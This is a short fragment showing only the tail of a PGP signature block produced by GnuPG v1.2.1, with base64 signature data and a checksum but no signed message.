Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+HEShfT7nyhUpoZMRAvoiAKCKhtJz+FVEW84Zr+NDEQ5xYcqf7gCgxLZ8
teSWsNMM8ls6TU7MfX7/lyM=
=bhV+
-----END PGP SIGNATURE-----